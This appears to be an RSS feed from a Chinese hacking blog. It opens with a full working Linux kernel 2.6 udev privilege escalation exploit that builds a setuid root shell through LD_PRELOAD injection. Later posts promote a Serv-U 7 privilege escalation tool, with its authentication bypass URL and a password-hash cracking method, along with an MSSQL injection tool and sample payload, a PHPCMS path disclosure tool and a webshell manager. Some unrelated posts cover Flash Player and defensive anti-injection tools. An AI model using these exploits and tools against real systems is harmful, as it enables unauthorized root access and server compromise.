<![CDATA[NetKnave 's BLog]]> http://www.netpk.org/blog/index.php zh-cn http://www.netpk.org/blog/read.php?477 <![CDATA[Linux Kernel 2.6 UDEV Local Privilege Escalation Exploit]]> NetKnave <admin@yourname.com> Fri, 24 Apr 2009 08:07:26 +0000 http://www.netpk.org/blog/read.php?477
#!/bin/sh
# Linux 2.6
# bug found by Sebastian Krahmer
#
# lame sploit using LD technique
# by kcope in 2009
# tested on debian-etch,ubuntu,gentoo
# do a 'cat /proc/net/netlink'
# and set the first arg to this
# script to the pid of the netlink socket
# (the pid is udevd_pid - 1 most of the time)
# + sploit has to be UNIX formatted text :)
# + if it doesn't work the 1st time try more often
#
# WARNING: maybe needs some FIXUP to work flawlessly
## greetz fly out to alex,andi,adize,wY!,revo,j! and the gang

cat > udev.c << _EOF
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <dirent.h>
#include <sys/stat.h>
#include <sysexits.h>
#include <wait.h>
#include <signal.h>
#include <sys/socket.h>
#include <linux/types.h>
#include <linux/netlink.h>

#ifndef NETLINK_KOBJECT_UEVENT
#define NETLINK_KOBJECT_UEVENT 15
#endif

#define SHORT_STRING 64
#define MEDIUM_STRING 128
#define BIG_STRING 256
#define LONG_STRING 1024
#define EXTRALONG_STRING 4096
#define TRUE 1
#define FALSE 0

int socket_fd;
struct sockaddr_nl address;
struct msghdr msg;
struct iovec iovector;
int sz = 64*1024;

main(int argc, char **argv) {
        char sysfspath[SHORT_STRING];
        char subsystem[SHORT_STRING];
        char event[SHORT_STRING];
        char major[SHORT_STRING];
        char minor[SHORT_STRING];

        sprintf(event, "add");
        sprintf(subsystem, "block");
        sprintf(sysfspath, "/dev/foo");
        sprintf(major, "8");
        sprintf(minor, "1");

        memset(&address, 0, sizeof(address));
        address.nl_family = AF_NETLINK;
        address.nl_pid = atoi(argv[1]);
        address.nl_groups = 0;

        msg.msg_name = (void*)&address;
        msg.msg_namelen = sizeof(address);
        msg.msg_iov = &iovector;
        msg.msg_iovlen = 1;

        socket_fd = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT);
        bind(socket_fd, (struct sockaddr *) &address, sizeof(address));

        char message[LONG_STRING];
        char *mp;

        mp = message;
        mp += sprintf(mp, "%s@%s", event, sysfspath) +1;
        mp += sprintf(mp, "ACTION=%s", event) +1;
        mp += sprintf(mp, "DEVPATH=%s", sysfspath) +1;
        mp += sprintf(mp, "MAJOR=%s", major) +1;
        mp += sprintf(mp, "MINOR=%s", minor) +1;
        mp += sprintf(mp, "SUBSYSTEM=%s", subsystem) +1;
        mp += sprintf(mp, "LD_PRELOAD=/tmp/libno_ex.so.1.0") +1;

        iovector.iov_base = (void*)message;
        iovector.iov_len = (int)(mp-message);

        char *buf;
        int buflen;
        buf = (char *) &msg;
        buflen = (int)(mp-message);

        sendmsg(socket_fd, &msg, 0);

        close(socket_fd);

  sleep(10);
  execl("/tmp/suid", "suid", (void*)0);
}

_EOF
gcc udev.c -o /tmp/udev
cat > program.c << _EOF
#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init()
{
setgid(0);
setuid(0);
unsetenv("LD_PRELOAD");
execl("/bin/sh","sh","-c","chown root:root /tmp/suid; chmod +s /tmp/suid",NULL);
}

_EOF
gcc -o program.o -c program.c -fPIC
gcc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o -nostartfiles
cat > suid.c << _EOF
int main(void) {
       setgid(0); setuid(0);
       execl("/bin/sh","sh",0); }
_EOF
gcc -o /tmp/suid suid.c
cp libno_ex.so.1.0 /tmp/libno_ex.so.1.0
/tmp/udev $1


Tags - , , , , , , , ]]> http://www.netpk.org/blog/read.php?475 <![CDATA[sql_2005_inj 0.2 Final [Code By kook1991]]]> NetKnave <admin@yourname.com> Mon, 16 Feb 2009 01:44:46 +0000 http://www.netpk.org/blog/read.php?475
sql_2005_inj 0.2 Final Code By kook1991 [Sql 2005 Injector Updated by kook E-Mail:7c7c7c7@gmail.com]

[1] What's Sql 2005 Injector?

http://www.pcsec.org/archives/sql-2005-inj-gui.html Updated
[2]What's it can do?

It's used to Sql injection MSSQL 2005 & 2008.
[3]What is its working theory?

Please Read:
http://www.pcsec.org/archives/SFX-SQLi-A-new-SQL-injection-technique-for-MSSQL-dumps-a-table-in-one-request.html

[4]How to use?

Example Url:

http://localhost/newsview.asp?id=0/**/union/**/select/**/1,2,3,4,5,6,[k],8

Replace the field which can be displayed on the page with [k].
点击在新窗口中浏览此图片

点击这里下载文件
Tags - , , ]]> http://www.netpk.org/blog/read.php?466 <![CDATA[serv-u7 local exploit php版]]> NetKnave <admin@yourname.com> Thu, 04 Dec 2008 06:21:49 +0000 http://www.netpk.org/blog/read.php?466
注:由于作者懒,没有提供日志清理功能,会留下日志:

一,su7是提权有几种方式?
有两种形式去干掉su7。
1>,登陆管理员控制台的页面
==>获取OrganizationId,用于添加用户
==>获取全局用户的“下一个新用户ID”
==>添加用户
==>添加用户的权限 or 添加全局用户权限
==>用户登陆
==>执行系统命令添加系统账户。

2>,登陆管理员控制台页面
==>基本WEB客户端
==>来到serv-u的目录下--users--Global user目录
==>上传一个你已经定义好的用户文件
==>用户登陆
==>执行系统命令添加系统账户
而本文件使用了第一种方法。

二,提权的原理?
Su7的管理平台是http的,很先进。
抓包,分析,发现了以下路程是可以利用的。
1,    管理员从管理控制台打开web页面时,是不需要验证密码的。
2,    管理员如果用某URL打开web页面时,虽然需要输入密码,但是无论输入什么,都可以进入。“/?Session=39893&Language=zh,CN&LocalAdmin=1”
3,    管理员可以添加用户有两种,一种是全局用户,一种是某个域下的用户。而权限设置也是两种,一种是全局,一种是针对用户。
4,    管理员添加了用户的这个包和设置权限这个包,是分开的。
所以,我可以抓包然后转换成php的socket连接post出去。
最后在用经典的ftp登陆,exec命令。达到提权。
在写php的过程中,遇到很多问题,比如函数不会用等等(—_—!以前没学过php),感谢“云舒牛”帮忙。。。
在分析包的流程,发现了一些特征,服务器返回的数据,全是以xml格式发来的。而在数据传输的过程中,设计的很经典。
Su7也有自己的数据库,他也会自己生成一个id。
这个ID是随机的,在你创建用户时,会先请求服务器生成一个,生成好后,修改该id的用户名,密码等。
这很像oracle的insert手段。

写工具的过程中,遇到很多麻烦,最大的麻烦就是这个ID问题,后来分析出来了。
添加权限时,也是可以利用这个ID的。
于是工具一共连接了6次服务器,这几次分别是:
1,    用来登陆平台,使用那个输入任何密码都可以登陆的页面地址。返回一个sessionid,这个sessionid在以后的包都用到了。
2,    获取OrganizationId,用于添加用户
3,    用来请求一个用户ID。
4,    修改该ID的登陆用户名,密码。
5,    修改该ID的权限,加c盘的写删执行等。
6,    这次连接是做坏事的,使用前面添加的用户执行系统命令。

三,为啥我明明显示成功了,但是却提不上去?
这要看错误代码了,这里偶很惭愧,并没有写详细的错误代码判断。
一般有以下几种情况:
1,可能是因为管理员密码不对。
参照管理员密码的连接。
2,可能是因为管理员限制了执行SITE EXEC。
有待程序修改,程序可以加一个让他不限制的功能。
3,可能是程序问题。
4,为啥作者有这么多理由不去改?
你没发现么?一旦把东西做完美了,那比较系统的防御方案就出来了。
如果不完美,让他以为我们就这点手段,防御系统也会这么认为。
不信的话,过段时间,防御方案出来了,肯定有一条:“修改site exec为不可访问”。
到时候,我再写个功能,把这玩意改回来就是。
所以,等大家都提倡要XXXX的时候,我再解决XXXX的问题。大家先这么玩着吧:)

四,关于管理员密码

默认为空,如果密码为空,填什么都能进去。
如果修改过,管理员密码默认会在这里:
C:\Program Files\RhinoSoft.com\Serv-U\Users\Local Administrator Domain\.Archive
文件中找到一个MD5密码值。
C:\Program Files\RhinoSoft.com\Serv-U
是su的根目录。
密码值的样式为(假设是123456)
kx#######################
#代表123456的32位MD5加密,而kx则是su对md5的密码算法改进的随机2位字符。
破解后的密码为kx123456,去掉kx就是密码了。
你可以针对这个加密生成字典。

下载地址:点我下载
Tags - , , , ]]> http://www.netpk.org/blog/read.php?461 <![CDATA[SQL-Helper 1.0 (SQLCancer)]]> NetKnave <admin@yourname.com> Thu, 13 Nov 2008 08:40:59 +0000 http://www.netpk.org/blog/read.php?461
点击在新窗口中浏览此图片

点击这里下载文件
Tags - , , ]]> http://www.netpk.org/blog/read.php?452 <![CDATA[PHPCMS2007爆路径及后台工具]]> NetKnave <admin@yourname.com> Sun, 28 Sep 2008 02:08:35 +0000 http://www.netpk.org/blog/read.php?452 得到密码却找不到后台。可以帮你找到后台
得到MD5破不出密码。可以帮你找到路径。读取数据库配置文件。或许这个明文密码就是后台密码。也可以用来社工进一步渗透。
或者可以备份shell 到爆出来的路径

呵呵。喜欢就顶起。。。。。

点击在新窗口中浏览此图片
点击在新窗口中浏览此图片

点我下载
Tags - , , ]]> http://www.netpk.org/blog/read.php?447 <![CDATA[Adobe Flash Player 10.0.12.10 RC]]> NetKnave <admin@yourname.com> Tue, 16 Sep 2008 05:17:05 +0000 http://www.netpk.org/blog/read.php?447 The beta contains several new features:
* Support for H.264 video and HE-AAC audio codecs .
* Enhancements to full-screen mode to use hardware scaling for improved video performance and quality on systems running Windows 2000 and newer or Mac OS X 10.2 and newer.
* Faster rendering of vector graphics on multi-core CPUs.
* Higher quality and performance for downscaling large bitmaps (SWF 9 only).
* Support for caching common platform components, such as the Flex framework, to reduce average application sizes. This feature is enabled in the Flex 3 beta available on Adobe Labs.
* Support for full-screen mode on Linux.

Also included in this update:
* Recursive calling to and from JavaScript via the ExternalInterface API is now permitted (not available in Opera or Netscape).
* Runtime errors can now be thrown from JavaScript to ActionScript via the External Interface API.
* HTTP requests from the Flash Player ActiveX Control in some versions of Internet Explorer did not include the Accept-Language header. The ActiveX Control now always inserts this header.
* Support for Microsoft Active Accessibility (MSAA) in the Windows plug-in.


Adobe Flash Player 10.0.12.10 RC for Windows
Adobe Flash Player 10.0.12.10 RC for Linux
Adobe Flash Player 10.0.12.10 RC for MacOS
Tags - , , ]]> http://www.netpk.org/blog/read.php?408 <![CDATA[阻止网页挂马的若干工具收藏]]> NetKnave <admin@yourname.com> Wed, 25 Jun 2008 07:56:04 +0000 http://www.netpk.org/blog/read.php?408
那么,除了在Web开发的时候注意以外,有什么有效的工具可以对抗SQL注入攻击?

今天,微软和惠普的安全部门合作发布了三个工具,分别是:

微软SQL注入攻击源码扫描器:Microsoft Source Code Analyzer for SQL Injection (MSCASI)。这个工具给网站开发人员使用。是一个静态扫描ASP代码的工具,可以查找发现第一类和第二类的SQL注入攻击漏洞。工具下载地址:

http://support.microsoft.com/kb/954476

惠普的 Scrawlr工具。这个工具可以被网站的维护人员使用,是一个黑箱扫描工具,不需要源代码。指定起始URL开始扫描。确定是不能准确定位代码的漏洞(因为是黑箱测试)。工具下载地址:

http://www.communities.hp.com/securitysoftware/blogs/spilabs/archive/2008/06/23/finding-sql-injection-with-scrawlr.aspx

微软的URLScan 3.0 Beta。这个工具可以被网站的维护人员使用。它是一个输入过滤工具。如果你发现网站被SQL注入工具,你可以在一边修补代码漏洞的同时,使用这个攻击在过滤掉恶意的输入。当然,修补代码中的漏洞是完全避免SQL注入攻击的真正解决方案。工具下载地址:

http://blogs.iis.net/wadeh/archive/2008/06/05/urlscan-v3-0-beta-release.aspx

SWI的博客上有更进一步的描述。http://blogs.technet.com/swi/archive/2008/06/24/new-tools-to-block-and-eradicate-sql-injection.aspx

那么,这三个工具是如何配合使用的?下面给出一个例子。

步骤一:网站的维护人员使用Scrawlr扫描网站,检查是否存在SQL注入漏洞

步骤二:发现存在漏洞后,通知开发人员。开发人员使用MSCASI对ASP源码静态扫描来确定代码中什么地方导致的SQL注入攻击漏洞。

步骤三:在开发人员修补漏洞的同时,维护人员可以使用URLScan来过滤可能的恶意输入,以确保网站的安全。

这三个工具的配合使用可以很大程度上减少网站被挂马的可能。说实话,现在被挂马的网站实在是太多了!

from:褚诚云blog ]]> http://www.netpk.org/blog/read.php?404 <![CDATA[WSC(WebShellControl)新版发布]]> NetKnave <admin@yourname.com> Sun, 08 Jun 2008 15:05:39 +0000 http://www.netpk.org/blog/read.php?404
注意:旧版数据库需要升级,把update.exe放在同目录下运行升级即可。

Shell备注处怎么填?
=>asp脚本
ADO数据库:Driver={Sql Server};Server=(local);Database=master;Uid=sa;Pwd=pass | 其它信息;

=>php脚本
MYSQL数据库:localhost | root | pass | 其它信息;
INFOMIX和ORACLE数据库: db(sid) | dbuser | dbpass | 其它信息。

其它信息处可填项:
1,附加POST项:|P>action=login&id=1;
2,无后缀脚本类型: 如SHELL地址最后的文件名是index.asp,index.php可去掉,在其它信息处标明脚本类型即可,如:{asp},{php}。

特色:
方便的数据库操作和文件操作功能。

更多更新,敬请关注http://www.gxgl.com/发布的更新信息。

部份效果图:
点击在新窗口中浏览此图片



点击这里下载文件
]]> http://www.netpk.org/blog/read.php?378 <![CDATA[超级巡警文件暴力删除工具 v1.2]]> NetKnave <admin@yourname.com> Thu, 06 Mar 2008 00:35:22 +0000 http://www.netpk.org/blog/read.php?378
1、暴力删除正在运行中的文件
2、粉碎并删除被其他程序占用的文件
3、粉碎后的文件无法使用数据恢复工具恢复

二、超级巡警暴力文件删除器主要解决如下问题:

1、遇到某个文件无法删除时,我们知道无法删除是被某个程序占用/锁定了,却不知道是哪个程序。

在该文件上点击右键,选择Sucop 暴力文件删除,此时会显示当前文件是被哪个程序占用/锁定了,点击解锁按钮,将对文件进行解锁,点击删除,将直接删除文件。
点击在新窗口中浏览此图片
什么?你的右键上没有Sucop 暴力文件删除?启动一下FileForceKiller.exe ,程序会自动注册鼠标右键。

2、木马/流氓软件删除不掉,删除后又生成。

启动FileForceKiller.exe,将相关文件拖拽到界面上,勾选强力阻止文件再生,然后点击暴力删除。此时被删除的文件无法在重生,本程序会自动生成一个同名文件并锁定该文件。(也可以CTRL+V直接将木马路径粘贴到列表中)
点击在新窗口中浏览此图片
3、重要/机密文档/照片销毁时,直接在文件上点击右键,选择Sucop 暴力文件删除,然后在弹出的窗口中选择删除。删除后的文件无法使用数据恢复工具恢复。

更多功能说明详见下面说明,相信这个小工具会成为您的好帮手:)

超级巡警暴力文件删除器(FileForceKiller) V1.2

大成天下-数据安全实验室(DSW LABS) 出品

本工具采用内核技术删除文件,能删除运行中文件或者被占用文件,可以用来查看文件被哪些程序占用,也可以在病毒分析中对一些顽固病毒木马衍生文件的删除。

本软件产品为免费软件,用户可以非商业性地下载、安装、复制和散发本软件产品。如果需要进行商业性的销售、复制和散发,必须获得DSWLAB的授权和许可,商业公司及团队使用本软件必须获得DSWLAB的授权和许可。

V1.2新增功能:

1.支持对目录的删除。
2.新增记忆勾选配置信息,使您使用更方便。
3.增强程序稳定性。
4.提高程序效率,对文件的解锁删除速度更快。
5.界面改动,更易用,右键更方便

详细功能说明如下:

1.拖拽文件或者点击"添加文件"按钮可添加文件到删除列表。

2.复制要删除的文件列表,粘贴(Ctrl + V)到删除列表。

3.勾选"强力阻止文件再生",可以阻止病毒木马再释放同名文件。

4.勾选"不删除有数字签名的文件",则会忽略对有数字签名文件的删除操作。

5.勾选"解锁后删除",则会在删除文件前尝试对文件进行解锁操作,这样更能确保成功删除文件。

6.勾选"删除前备份(.bak)",可以在删除前把您的文件备份为.bak文件,防止您误操作,以供您恢复用。

7.勾选"窗口置顶",可以使窗口总出现在桌面的最上方。

8.勾选"注册Shell右键菜单",可以注册系统右键菜单(Sucop 暴力文件删除)。

FileForceKiller注册的系统右键菜单详细功能说明如下:

9.对上锁的文件,可以点击"解锁"按钮,强行解锁。

10.勾选"删除前自动解锁",则会在删除文件前尝试对文件进行解锁。

11.勾选"删除前强行卸载模块",如果要删除的文件正处于运行状态,则会强行卸载这个文件对应的模块。

12.点击"删除"按钮,则可对文件和目录进行删除,如果是目录则会连同子目录下的文件也一同删除,在删除文件前,会涂改/擦写文件占用的扇区,文件删除后,将彻底不可恢复。

13.自动检查更新和升级。

下载地址:
http://u8.dswlab.com/FileForceKiller.zip
http://update4.dswlab.com/FileForceKiller.zip

Tags - ]]> http://www.netpk.org/blog/read.php?372 <![CDATA[单服务器无限泛域名解析工具-实现单IP捆绑解析多个泛域名]]> NetKnave <admin@yourname.com> Thu, 28 Feb 2008 02:35:19 +0000 http://www.netpk.org/blog/read.php?372 做个记号。还没来得急用。回头把试用情况报告一下先
运行环境:
该软件能运行在 Windows NT/2000/XP/2003 下,支持 IIS5/IIS6
该软件为免费软件,永久免费  
主要功能:
解析无限个泛域名到不同的网站目录
解析二级域名到指定目录
主要用途:
单个 IP 上捆绑解析多个泛域名,并且指向不同的网站目录下
简单解析二级域名使用

[主要功能]

威盾泛域名解析器是一个 IIS 的 ISAPI 过滤器,安装后能实现单个IP捆绑解析多个泛域名。

[使用方法]

1,打开配置工具 VwPanDomainCfg.exe,如果 IIS 上没有配置泛域名解析,请先在 IIS 上配置,
   IIS 上配置泛域名的方法大家应该都了解,简单的方法是:在添加一个站点的时候不域名那里留空即可。

2,在 VwPanDomainCfg.exe 配置工具里,第一块配置区域是“IIS 上泛域名信息”。
   如果 IIS 上的泛域名未配置 IP 地址,这里要配置一下。双击选中的行即可配置。

3,在 VwPanDomainCfg.exe 配置工具里,第二块配置区域是“泛域名解析器配置”。
   首先,要加载过滤器,请点旁边的“安装”按钮来安装过滤器,等过滤器提示“已加载 IIS 过滤器”即可。
   其次,要选中“开启多泛域名解析”,然后就是点下面的“配置”按钮配置了。

4,点“保存”按钮,保存配置,重启一下 IIS 即可。

这是官方下载链接:http://www.vidun.com/vwsoft.php?pn=vwpandomain&vi=download
也有绿色版的。绿色版的就百度:威盾泛域名解析器
Tags - , , ]]>